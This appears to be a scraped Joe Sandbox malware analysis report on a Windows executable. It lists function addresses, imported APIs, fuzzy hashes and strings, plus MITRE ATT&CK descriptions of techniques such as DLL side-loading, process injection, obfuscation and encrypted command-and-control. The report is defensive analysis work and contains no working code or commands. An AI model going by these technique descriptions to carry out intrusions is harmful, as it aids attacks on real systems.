Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _aligned_malloc$?set_new_handler@std@@ExceptionThrow
String ID:
API String ID: 3809495272-0
Opcode ID: d6d8ec99ed71804cc5e165d071c3a62ee25e79da49a870176cd981dc3c9e7104
Instruction ID: cd654924345ee5ce47a7dace3fba7aaa8db95693adf352cde27cd88cb705f7e6
Opcode Fuzzy Hash: d6d8ec99ed71804cc5e165d071c3a62ee25e79da49a870176cd981dc3c9e7104
Instruction Fuzzy Hash: 05F0A921B2974382EF20A711E2402BA6362AF867C4F484439D67E877D6FF3CE840C301

Function 00007FF6F18A4E02 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

_Mtx_lock.MSVCP140 ref: 00007FF6F18A4C6F
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4C7E
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4C9A
_Cnd_wait.MSVCP140 ref: 00007FF6F18A4CBE
_Mtx_unlock.MSVCP140 ref: 00007FF6F18A4CDC

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Cpp_error@std@@Throw_$Cnd_waitMtx_lockMtx_unlock
String ID:
API String ID: 2823240549-0
Opcode ID: ee6b3d65f262b41cf65fae1c60849f45d84e25cf3d9c5279c7e74acb2dc0baf7
Instruction ID: 75b90b0ab40aef3ffdedbf84c183e0970c9c7d7a2fc4c012ddcc83458fe1bd23
Opcode Fuzzy Hash: ee6b3d65f262b41cf65fae1c60849f45d84e25cf3d9c5279c7e74acb2dc0baf7
Instruction Fuzzy Hash: FE018071A2860692EB64CB61D28033927A6FF90BD4F184135D63E839D8EF3CD454C700

Function 00007FF6F18B91D0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18AF230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18AF261

memmove.VCRUNTIME140 ref: 00007FF6F18B9216
memset.VCRUNTIME140 ref: 00007FF6F18B921F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B9224
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B9230

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfofreememmovememset
String ID:
API String ID: 3846007628-0
Opcode ID: 965b0cea40db2dd5484ae41bae128ca2fe7beb19a023e5403b8821f68df85f68
Instruction ID: 578d2dd1b74a8e6b07ac2dbe6e57e4df7d31cbb5341faf5373a0b3ab7ec782fa
Opcode Fuzzy Hash: 965b0cea40db2dd5484ae41bae128ca2fe7beb19a023e5403b8821f68df85f68
Instruction Fuzzy Hash: 3C018F65E28BC181EB24DB6697550697721AF44FE0F588331EE3D83BC9EF2CD4428600

Function 00007FF6F18CD24C Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32 ref: 00007FF6F18CD26C
GetLastError.KERNEL32 ref: 00007FF6F18CD276
SetFileInformationByHandle.KERNEL32 ref: 00007FF6F18CD2A9
GetLastError.KERNEL32 ref: 00007FF6F18CD2B3

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ErrorFileHandleInformationLast
String ID:
API String ID: 275135790-0
Opcode ID: f7a71d2a070d1eb89dc48099325a41ab15c997c9ff49bf58622e46bb54924863
Instruction ID: 63beaf9812d6f8fc82cdb337b7f6091ca045655eec6be69e5c651c2a58889d71
Opcode Fuzzy Hash: f7a71d2a070d1eb89dc48099325a41ab15c997c9ff49bf58622e46bb54924863
Instruction Fuzzy Hash: C0F0D631B2828292F7646B71D5946B53B92AF017D0F040335C93BC26D4FF6CF9888280

Function 00007FF6F18C6DC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C6E9A

Strings

F, xrefs: 00007FF6F18C6E12
IteratedHashBase: input data exceeds maximum allowed by hash function , xrefs: 00007FF6F18C6E1B

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: F$IteratedHashBase: input data exceeds maximum allowed by hash function
API String ID: 3668304517-3216730400
Opcode ID: 44828b26478d83eba3a3456edfcb2b944f431d1cab852ab19c7cb65d8aa908aa
Instruction ID: 2128c59f6654eac899c69d06a44e9ee4ff5aecd51dae13d0b07a3a2c6d6c3580
Opcode Fuzzy Hash: 44828b26478d83eba3a3456edfcb2b944f431d1cab852ab19c7cb65d8aa908aa
Instruction Fuzzy Hash: 33315372A28B4581DB149B55F5803697760FB88BE4F608236E6BD837E5EF3CD494C700

Function 00007FF6F18A24A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18A1620: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A16D1

__std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A251A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A255E

Strings

Unknown exception, xrefs: 00007FF6F18A25B3

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: Unknown exception
API String ID: 1944019136-410509341
Opcode ID: da4a1329aade7958d814fdce164dd18ac8d2dc850fe1f7a00ef9e6bcdb6ada32
Instruction ID: 20e978c8eec3a751f12c195b01c48a7bb272bfcfe789931517a62608605dd2a5
Opcode Fuzzy Hash: da4a1329aade7958d814fdce164dd18ac8d2dc850fe1f7a00ef9e6bcdb6ada32
Instruction Fuzzy Hash: F0419322E28B8582EB108F28E5503A973A1FB55B98F109335DABC426E5FF3CD5D5C740

Function 00007FF6F18B3A90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3B6A

Strings

6, xrefs: 00007FF6F18B3AD8
: Nonblocking input is not implemented by this object., xrefs: 00007FF6F18B3AE1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: 6$: Nonblocking input is not implemented by this object.
API String ID: 3668304517-4211927919
Opcode ID: ce84c0e685760eca1138f9466f7fc6cbe752b6f07a4d490f8ea52aa92f9a8333
Instruction ID: 9329a96edf4d0d5625192f6d42b1dde1a35e4a71db9dc9e43f78a850b7473e34
Opcode Fuzzy Hash: ce84c0e685760eca1138f9466f7fc6cbe752b6f07a4d490f8ea52aa92f9a8333
Instruction Fuzzy Hash: 7C216F62A28B4691DB10DB60E55036977A1FB897E4F504236EABC837E9EF3CE194C700

Function 00007FF6F18B0EB0 Relevance: 5.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B0F13

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: e6b7ef13a2f3db01a5f327f9bdac6633a327a4a150576746589c4444313add46
Instruction ID: 9f93a3d4b263459f20c5d147630eda2ed223eebfbe4a87653137e8b75dc81137
Opcode Fuzzy Hash: e6b7ef13a2f3db01a5f327f9bdac6633a327a4a150576746589c4444313add46
Instruction Fuzzy Hash: 9F510862B28A8581EB60DB25E4553AE7770FB95BC4F805031DBAD87B96EF3CD508CB00

Function 00007FF6F18C7110 Relevance: 5.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 00007FF6F18C71BC
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 00007FF6F18C7202
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 00007FF6F18C723E
_CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 00007FF6F18C72C5

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$ExceptionThrow
String ID:
API String ID: 1747913114-0
Opcode ID: d5f376a5cccd3198d1004873e07457892607b693d556a94932a516f2a5357fa0
Instruction ID: e1a63a973327cbd7ded5df7478a9fe46c91df8c6b661f4c59215afc537158b96
Opcode Fuzzy Hash: d5f376a5cccd3198d1004873e07457892607b693d556a94932a516f2a5357fa0
Instruction Fuzzy Hash: BB411562B2568642EF14DA26D9142B9A792BF44FC4F488631DE3E877C1FF3CE5468300

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PC4rbXSgl4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: PC4rbXSgl4.exePID: 7568, Parent PID: 2580

General

Chronological Activities

Windows Analysis Report
PC4rbXSgl4.exe

Function 00007FF6F18A5A50 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 293
networkCOMMON

Function 00007FF6F18C48C0 Relevance: 16.4, APIs: 8, Strings: 1, Instructions: 626
COMMON

Function 00007FF6F18B7A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
COMMON

Function 00007FF6F18CE0C0 Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 00007FF6F18A73F0 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 162
serviceCOMMON

Function 00007FF6F18AB370 Relevance: 13.6, APIs: 9, Instructions: 136
COMMON

Function 00007FF6F18AD310 Relevance: 13.6, APIs: 9, Instructions: 131
COMMON

Function 00007FF6F18CE0DC Relevance: 10.6, APIs: 7, Instructions: 94
COMMON

Function 00007FF6F18B73F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
COMMON

Function 00007FF6F18B8A50 Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Function 00007FF6F18B1BB0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 117
COMMON

Function 00007FF6F18AB550 Relevance: 4.5, APIs: 3, Instructions: 17
COMMON

Function 00007FF6F18B96F0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON